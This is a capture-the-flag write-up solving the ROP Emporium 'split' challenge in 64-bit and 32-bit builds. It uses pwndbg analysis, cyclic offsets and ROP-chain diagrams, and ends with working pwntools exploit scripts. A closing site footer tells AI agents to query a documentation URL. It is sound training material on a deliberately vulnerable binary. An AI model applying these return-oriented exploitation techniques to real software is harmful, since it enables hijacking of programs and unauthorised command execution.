# split ## 64 bit Let's run the executable to check what it does. ``` $ ./split split by ROP Emporium x86_64 Contriving a reason to ask user for data... > 1111111 Thank you! Exiting ``` It takes user input and then exits. We can use the `checksec` utility in order to identify the security properties of the binary executable. ``` $ checksec split [*] '/home/hacker/ropEmporium/split/split' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) ``` There's two important properties we want to focus on here: * `NX enabled`: This means that the stack is not executable. Therefore we cannot use a shellcode injection. * `No PIE (0x400000)`: This means that the executable is not positionally independent and it is always loaded at address `0x400000`. So the code and memory regions will have the same address every time we run it. Let's open the executable using `gdb-pwndbg` and look at the functions. ``` pwndbg> info functions All defined functions: Non-debugging symbols: 0x0000000000400528 _init 0x0000000000400550 puts@plt 0x0000000000400560 system@plt 0x0000000000400570 printf@plt 0x0000000000400580 memset@plt 0x0000000000400590 read@plt 0x00000000004005a0 setvbuf@plt 0x00000000004005b0 _start 0x00000000004005e0 _dl_relocate_static_pie 0x00000000004005f0 deregister_tm_clones 0x0000000000400620 register_tm_clones 0x0000000000400660 __do_global_dtors_aux 0x0000000000400690 frame_dummy 0x0000000000400697 main 0x00000000004006e8 pwnme 0x0000000000400742 usefulFunction 0x0000000000400760 __libc_csu_init 0x00000000004007d0 __libc_csu_fini 0x00000000004007d4 _fini ``` There is a function called `usefulFunction`. Let's disassemble it and see how useful it is. ### usefulFunction() ``` pwndbg> disassemble usefulFunction Dump of assembler code for function usefulFunction: 0x0000000000400742 <+0>: push rbp 0x0000000000400743 <+1>: mov rbp,rsp 0x0000000000400746 <+4>: mov edi,0x40084a 0x000000000040074b <+9>: call 0x400560 0x0000000000400750 <+14>: nop 0x0000000000400751 <+15>: pop rbp 0x0000000000400752 <+16>: ret End of assembler dump. ``` We can see that the instruction at `usefulFunction+9` makes a system call and that the instruction at `usefulFunction+4` loads the argument. ``` pwndbg> x/s 0x40084a 0x40084a: "/bin/ls" ``` So this system call executes `/bin/ls` which isn't what we want. We want it to execute `/bin/cat flag.txt`. ### /bin/cat flag.txt Let's search the string `/bin/cat flag.txt`. ``` pwndbg> search /bin/cat Searching for value: '/bin/cat' split 0x601060 '/bin/cat flag.txt' ``` We can link this string with our system call in order to read the `flag.txt` file. In order to put this string into `rdi`, we will need a `pop rdi` gadget. ### pop rdi gadget We can find the gadget using the `ROPgadget` utility. ``` $ ROPgadget --binary split | grep "pop rdi" 0x00000000004007c3 : pop rdi ; ret ``` We can see that the address of the `pop rdi` gadget is `0x00000000004007c3`. ### Cyclic pattern We now have to find the offset using a cyclic pattern. ``` pwndbg> cyclic aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa ``` Let's provide this as input. ``` ──────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────────────────── *RAX 0xb RBX 0x0 *RCX 0x7ffff7ea2a37 (write+23) ◂— cmp rax, -0x1000 /* 'H=' */ *RDX 0x1 *RDI 0x7ffff7fa9a70 (_IO_stdfile_1_lock) ◂— 0x0 *RSI 0x1 *R8 0xa *R9 0x7ffff7fc9040 (_dl_fini) ◂— endbr64 *R10 0x7ffff7d945e8 ◂— 0xf001200001a64 *R11 0x246 *R12 0x7fffffffdfd8 —▸ 0x7fffffffe21b ◂— '/home/kunal/ropEmporium/split/split' *R13 0x400697 (main) ◂— push rbp R14 0x0 *R15 0x7ffff7ffd040 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0x0 *RBP 0x6161616161616165 ('eaaaaaaa') *RSP 0x7fffffffdeb8 ◂— 'faaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaa' *RIP 0x400741 (pwnme+89) ◂— ret ``` The `rbp` register points to `0x6161616161616165` which is the little endian `eaaaaaaa` in ASCII. Let's find the offset of this value in our cyclic pattern. ``` pwndbg> cyclic -l 0x6161616161616165 Finding cyclic pattern of 8 bytes: b'eaaaaaaa' (hex: 0x6561616161616161) Found at offset 32 ``` So the offset is 32 bytes. Let's see how this looks on the stack. ### Stack ``` <======: Value is stored at that location <------: Points to the address +---------------------------+ | 61 61 61 61 61 61 61 61 | <====== buffer (32 bytes) <------ rsp | 62 61 61 61 61 61 61 61 | | 63 61 61 61 61 61 61 61 | | 64 61 61 61 61 61 61 61 | +---------------------------+ | 65 61 61 61 61 61 61 61 | <====== stored rbp <------ rbp +---------------------------+ | 66 61 61 61 61 61 61 61 | <====== return address <------ rip +---------------------------+ ``` We can see that if we increment the `rbp` by 8, it will point to the saved return address. Therefore the distance between the buffer and the saved return address is `offset+8` which is equal to 40. ### Exploit requirements We now have all the information we need to create an exploit. * [x] Number of padding bytes: `40` * [x] Address of `pop rdi` gadget: `0x00000000004007c3` * [x] Address of `/bin/cat flag.txt`: `0x601060` * [x] Address of `call `: `0x000000000040074b` All that remains is to link these pieces of information to create a ROP chain. ### ROP chain In this technique, we have to execute our instructions in a carefully chosen sequence: 1. First we have to replace the `return address` with the address of the `pop rdi` gadget so that it is executed when `pwnme` returns. 2. Then we have to chain it with the address of the `/bin/cat flag.txt` string so that it gets popped into the `rdi register`. 3. Finally we chain it with the address of the `system@plt` call. This is what the ROP chain would look like on the stack. ``` Stack: +---------------------------+ | 00 00 00 00 00 40 07 c3 | <====== return address <------ rsp | ( pop rdi ) | +---------------------------+ | 00 00 00 00 00 60 10 60 | | ( /bin/cat flag.txt ) | +---------------------------+ | 00 00 00 00 00 40 07 4b | | ( system@plt ) | +---------------------------+ ==================================================================== pwnme() return <------ rip # This gadget will pop the value pointed to by rsp into rip ==================================================================== Stack: +---------------------------+ | 00 00 00 00 00 60 10 60 | <------ rsp | ( /bin/cat flag.txt ) | +---------------------------+ | 00 00 00 00 00 40 07 4b | | ( system@plt ) | +---------------------------+ ==================================================================== pop rdi <------ rip # This gadget will pop the value pointed to by rsp into rdi ==================================================================== Stack: +---------------------------+ | 00 00 00 00 00 40 07 4b | <------ rsp | ( system@plt ) | +---------------------------+ Registers: rdi: 0x601060 ==================================================================== call <------ rip # This gadget makes a system call based on the argument in rdi ==================================================================== ``` ### Exploit ```python from pwn import * padding = b"a"*40 poprdi_addr = p64(0x00000000004007c3) bincat_addr = p64(0x601060) system_addr = p64(0x000000000040074b) payload = padding + poprdi_addr + bincat_addr + system_addr p = process('./split') p.sendline(payload) p.interactive() ``` Let's run the exploit. ``` $ python exploit.py [+] Starting local process './split': pid 987 [*] Switching to interactive mode split by ROP Emporium x86_64 Contriving a reason to ask user for data... > Thank you! ROPE{a_placeholder_32byte_flag!} ``` ## 32 bit ### usefulFunction() ``` pwndbg> disassemble usefulFunction Dump of assembler code for function usefulFunction: 0x0804860c <+0>: push ebp 0x0804860d <+1>: mov ebp,esp 0x0804860f <+3>: sub esp,0x8 0x08048612 <+6>: sub esp,0xc 0x08048615 <+9>: push 0x804870e 0x0804861a <+14>: call 0x80483e0 0x0804861f <+19>: add esp,0x10 0x08048622 <+22>: nop 0x08048623 <+23>: leave 0x08048624 <+24>: ret End of assembler dump. ``` The arguments for a 32-bit function call are pushed on the stack. At `usefulFunction+9`, we can see the argument for the system call being pushed onto the stack. Let's see what the argument is. ``` pwndbg> x/s 0x804870e 0x804870e: "/bin/ls" ``` We have to replace this argument with `/bin/cat flag.txt`. ### /bin/cat flag.txt ``` pwndbg> search /bin/cat Searching for value: '/bin/cat' split32 0x804a030 '/bin/cat flag.txt' ``` We can link this string with our system call in order to read the `flag.txt` file. In this case we do not need a `pop rdi` gadget because as we saw the arguments are not stored in registers. ### Cyclic pattern We now have to find the offset using a cyclic pattern. ``` pwndbg> cyclic aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa ``` Let's provide this as input. ``` ──────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────────────────── *EAX 0xb *EBX 0xf7fad000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x229dac *ECX 0xf7fae9b4 (_IO_stdfile_1_lock) ◂— 0x0 *EDX 0x1 *EDI 0xf7ffcb80 (_rtld_global_ro) ◂— 0x0 *ESI 0xffffd104 —▸ 0xffffd231 ◂— '/home/kunal/ropEmporium/split32/split32' *EBP 0x61616166 ('faaa') *ESP 0xffffd030 ◂— 'gaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaa' *EIP 0x61616161 ('aaaa') ``` The `ebp` register points to `0x61616166` which is the little endian `faaa` in ASCII. Let's find the offset of this value in our cyclic pattern. ``` pwndbg> cyclic -l 0x61616166 Finding cyclic pattern of 8 bytes: b'faaa' (hex: 0x61616166) Found at offset 40 ``` So the offset is 40 bytes. Let's see how this looks on the stack. ``` <======: Value is stored at that location <------: Points to the address +---------------+ | 61 61 61 61 | <====== buffer (32 bytes) <------ esp | 62 61 61 61 | | 63 61 61 61 | | 64 61 61 61 | | 65 61 61 61 | | 66 61 61 61 | | 67 61 61 61 | | 68 61 61 61 | | 69 61 61 61 | | 6A 61 61 61 | +---------------+ | 6B 61 61 61 | <====== stored ebp <------ ebp +---------------+ | 6C 61 61 61 | <====== return address +---------------+ ``` We can see that if we increment the `ebp` by 4, it will point to the saved return address. Therefore the distance between the buffer and the saved return address is `offset+4` which is equal to 44. ### Exploit requirements We now have all the information we need to create an exploit. * [x] Number of padding bytes: `44` * [x] Address of `/bin/cat flag.txt`: `0x804a030` * [x] Address of `call `: `0x0804861a` All that remains is to link these pieces of information to create a ROP chain. ### ROP chain In this technique, we have to execute our instructions in a carefully chosen sequence: 1. First we have to replace the `return address` with the address of the `system@plt` call so that it is executed when `pwnme` returns. 2. Then we have to chain it with the address of the `/bin/cat flag.txt` string so that it can act as the argument of the `system@plt` call. * This is what the ROP chain would look like on the stack. ``` Stack:- +--------------------------+ | 08 04 86 1a | <====== return address <------ esp | ( system@plt ) | +--------------------------+ | 08 04 a0 30 | | ( /bin/cat flag.txt ) | +--------------------------+ ===================================================================== pwnme() return <------ eip # This gadget will pop the value pointed to by the esp into eip ===================================================================== Stack:- +--------------------------+ | 08 04 a0 30 | <------ esp | ( /bin/cat flag.txt ) | +--------------------------+ ===================================================================== call <------ eip # This gadget makes a system call based on the argument on the stack ===================================================================== ``` ### Exploit ```python from pwn import * padding = b"a"*44 bincat_addr = p32(0x804a030) system_addr = p32(0x0804861a) payload = padding + system_addr + bincat_addr p = process('./split32') p.sendline(payload) p.interactive() ``` Let's run the exploit. ``` $ python exploit.py [+] Starting local process './split32': pid 16511 [*] Switching to interactive mode split by ROP Emporium x86 Contriving a reason to ask user for data... > Thank you! ROPE{a_placeholder_32byte_flag!} ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kunalwalavalkar.gitbook.io/write-ups/rop-emporium/split.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.